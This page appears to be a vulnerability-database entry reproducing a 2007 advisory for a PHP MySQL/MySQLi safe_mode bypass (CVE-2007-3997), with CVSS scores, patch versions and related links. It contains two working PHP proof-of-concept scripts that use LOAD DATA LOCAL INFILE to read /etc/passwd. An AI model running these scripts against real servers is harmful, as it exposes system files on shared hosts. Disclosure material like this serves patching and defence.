Lucene search
Mattias BengtssonEXPLOITPACK:775CF249B89B4495D15228BEA64056EFHistorySep 10, 2007 - 12:00 a.m.
PHP 4.4.75.2.3 - MySQLMySQLi Safe_Mode Bypass
2007-09-1000:00:00
Mattias Bengtsson
27
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
PHP 4.4.75.2.3 - MySQLMySQLi Safe_Mode Bypass
Affected Products:
<= PHP 5.2.3
<= PHP 4.4.7
Authors:
Mattias Bengtsson <[email protected]>
Philip Olausson <[email protected]>
Reported:
2007-06-05
Released:
2007-08-30
CVE:
CVE-2007-3997
Issue:
A vulnerability exists in PHP's MySQL and MySQLi extenstions which can be used to bypass PHP's safe_mode security restriction.
Description:
PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.
Details:
By using MySQLs LOCAL INFILE we could bypass PHP's safe_mode security restriction. An important thing here is that we can't rely on the shared hosts MySQLds local-infile=0 option. This because of it being a server option, so it will not have any effect on the client. To disable this option for MySQL we need to compile libmysqlclient with --disable-local-infile, or remove the CLIENT_LOCAL_FILES flag while connecting. PHP does this when open_basedir are in effect but lacks a check for safe_mode.
For MySQLi compiling with --disable-local-infile won't help because we could just reenable it with mysqli->options(MYSQLI_OPT_LOCAL_INFILE, 1);
Proof Of Concepts:
MySQL:
<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l); mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>
MySQLi:
<?php
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>
Impact:
This issue could have major impact on shared hosting systems.
Solution:
Upgrade PHP to 5.2.4 or 4.4.8
# milw0rm.com [2007-09-10]Related
prion
prion
Design/Logic Flaw
2007-09-04 18:17:00
Design/Logic Flaw
2007-09-14 01:17:00
ubuntucve
ubuntucve
CVE-2007-3997
2007-09-04 00:00:00
CVE-2007-4889
2007-09-14 00:00:00
seebug
seebug
PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
2007-09-10 00:00:00
PHP MySQL/MySQLi扩展绕过安全限制漏洞
2007-09-05 00:00:00
PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
2014-07-01 00:00:00
redhatcve
redhatcve
CVE-2007-3997
2015-10-30 10:13:33
CVE-2007-4889
2015-10-30 09:54:31
cve
cve
CVE-2007-3997
2007-09-04 18:17:00
CVE-2007-4889
2007-09-14 01:17:00
exploitdb
exploitdb
PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass
2007-09-10 00:00:00
f5
f5
nessus
nessus
PHP < 4.4.8 Multiple Vulnerabilities
2008-01-03 00:00:00
GLSA-200710-02 : PHP: Multiple vulnerabilities
2007-10-09 00:00:00
openvas
openvas
PHP < 4.4.8 Multiple Vulnerabilities
2012-06-21 00:00:00
PHP < 4.4.8 Multiple Vulnerabilities
2020-08-17 00:00:00
Oracle: Security Advisory (ELSA-2007-0890)
2015-10-08 00:00:00
oraclelinux
oraclelinux
Moderate: php security update
2007-09-20 00:00:00
freebsd
freebsd
php -- multiple vulnerabilities
2007-08-30 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2007-10-07 00:00:00
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
Related for EXPLOITPACK:775CF249B89B4495D15228BEA64056EF